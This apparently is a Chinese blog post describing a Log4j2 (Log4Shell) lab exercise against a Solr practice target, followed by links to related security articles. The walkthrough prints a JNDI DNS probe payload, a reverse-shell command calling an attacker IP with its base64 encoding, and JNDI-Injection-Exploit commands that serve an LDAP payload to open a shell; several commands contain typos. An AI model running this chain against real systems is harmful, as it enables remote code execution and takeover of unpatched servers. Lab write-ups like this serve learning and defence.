log4j2漏洞练习

已于 2024-08-01 20:51:25 修改
阅读量305 收藏
点赞数 6
文章标签: log4j 安全 web安全
于 2024-07-31 22:23:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C233333235/article/details/140832337
版权

      log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响的版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响。

      打开靶场后,我们进入这样的一个页面,在/solr/admin/cores的目录下可以上传参数,构造一个参数:${jndi:dns://${sys:java.version}.example.com},其中example.com是从dnslog中随机获取的一个地址

我们将参数提交访问后回到dnslog页面刷新查看就会得到版本信息

然后我们准备尝试反弹shell,先构造pyload

ash -i >& /dev/tcp/http://123.57.239.114/8888 0>&1
//反弹shell,ip为攻击机ip

YXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=
//编码后的反弹shell

java -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的vpsip]
//命令模板

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash -c {echo,YXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=}|{base64,-d}|bash" -A 123.57.239.114
//最终pyload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -i 192.168.116.128

运行后显示如下代码

我们将jdk1.8一栏中的ldap://123.57.239.114:1389/5v2lkc语句复制下来替换拼接到靶场url后面然后点击回车访问,即可反弹shell

Atopos`
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
log4j2漏洞检测工具
05-07
**Log4j2漏洞检测工具详解** 在当前的IT环境中,安全问题日益凸显,特别是针对开源组件的安全漏洞Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的...
LOG4J RCE 漏洞分享与自查.pdf
12-15
Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j ...
Struts2框架下Log4j2漏洞检测方法分析与总结
Hacker_j1的博客
07-07 1145
叒有一段时间没写文章了,正好周末有时间就来写写,本文来讲讲有关SQL注入相关的知识点会尽可能详细的写出来,比较适合刚入门安全的小白进行学习,希望能在面试或实战中助你一臂之力。如有大佬发现文中内容有错误的地方恳请斧正!也欢迎各位师傅共同交流学习技术!
Log4j史诗级漏洞,我们这些小公司能做些什么?
程序新视界
12-11 6058
事件背景 12月10日,看到朋友圈中已经有人在通宵修改、上线系统了。随即,又看到阿里云安全、腾讯安全部门发出的官方报告:”Apache Log4j2存在远程代码执行漏洞“,且漏洞已对外公开。 看到相关消息,马上爬起来把所有项目的日志系统过滤一遍,还好老项目采用的log4j,新项目采用的logback,没有中招。随后就看到朋友圈铺天盖地的相关消息。 作为一个史诗级的事件,紧急修改漏洞是必然的。作为程序员,如果看到这则消息,连去核查一下系统都做不到,那真的不是一个合格的程序员。 经历过这次事件,不仅是看热闹而已
如何看待 Apache Log4j 2 远程代码执行漏洞
实验楼--动手做实验,轻松学IT!
12-30 211
如何看待 Apache Log4j 2 远程代码执行漏洞
内网打靶练习(log4j2、私钥泄露)
博客地址 www.sec0nd.top
05-20 1344
文章目录靶机背景介绍getshell (log4j2 RCE)漏洞验证存在注入的点反弹shell域渗透 靶机背景介绍 搭建靶机的过程过几天我再写,先写一下复现的过程(最近有些懒了) web服务端:centos 192.168.80.130(外) 192.168.75.130(内) 内网的主机:Windows10 192.168.75. kali攻击机:kali 192.168.80.131 getshell (log4j2 RCE) 来看一下web服务端,是一个solr框架昂 然后我们看一下so
vulhub漏洞复现九_log4j/2
weixin_44193247的博客
01-11 1959
vulhub漏洞复现练习
靶机渗透练习07-HackMyVm Area51 (Log4j2复现)
Force~
03-31 2867
靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Area51 网盘链接:https://pan.baidu.com/s/1MYO7cEOg2xou1FrC40v6qg?pwd=ja7r 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover.
log4j2.17.2
04-14
总结,log4j2.17.2是应对Log4j2 RCE漏洞的重要更新,通过加强安全配置和限制危险功能,为Java应用程序提供了更坚固的安全屏障。对于依赖Log4j2的系统而言,及时升级至该版本是保障系统安全、防范潜在风险的有效手段...
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Spring踩坑:抽象类作为父类,使用子类@Autowired属性进行填充,属性值为null
five-five
07-25 1320
本文将深入探讨在Spring Boot 2.0及以上版本中使用抽象类作为父类时的最佳实践,特别关注依赖注入的正确使用方式。在Spring Boot 2.0及以上版本中,我们可以直接在抽象类的属性上使用@Autowired注解进行依赖注入。这意味着在构造器执行时,@Autowired注解的属性还没有被注入,它们的值为null。这个问题在子类中更加复杂。当你创建一个抽象类的子类时,子类的构造器会首先调用父类的构造器。这意味着即使是在子类的构造器中,父类中@Autowired注解的属性仍然是null。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1352
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 807
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(超详细)
weixin_60838266的博客
07-28 725
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“超文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(超详细)
最新发布
weixin_60838266的博客
07-29 594
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1471
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1343
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
apache log4j2漏洞
01-13
Apache Log4j2是一个流行的Java日志框架,用于记录应用程序的日志信息。然而,最近发现了一个严重的漏洞,被称为Apache Log4j2远程代码执行漏洞。该漏洞允许攻击者通过精心构造的日志消息触发远程代码执行,从而完全控制受影响的应用程序。 攻击者可以通过在日志消息中插入恶意的Java代码来利用此漏洞。当应用程序使用Log4j2来记录这些恶意的日志消息时,Log4j2会尝试解析并执行其中的代码,从而导致远程代码执行。 这个漏洞的危害非常严重,因为它可以被远程利用,而且攻击者可以完全控制受影响的应用程序。攻击者可以执行任意的系统命令、访问敏感数据、篡改应用程序的行为等。 目前,Apache Log4j2的开发团队已经发布了修复此漏洞的补丁,并建议所有受影响的用户尽快升级到最新版本。此外,还可以通过配置Log4j2安全策略来限制日志消息的解析和执行,以减轻此漏洞的风险。 如果你想了解更多关于Apache Log4j2远程代码执行漏洞的详细信息,可以参考引用和引用中提供的文章。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值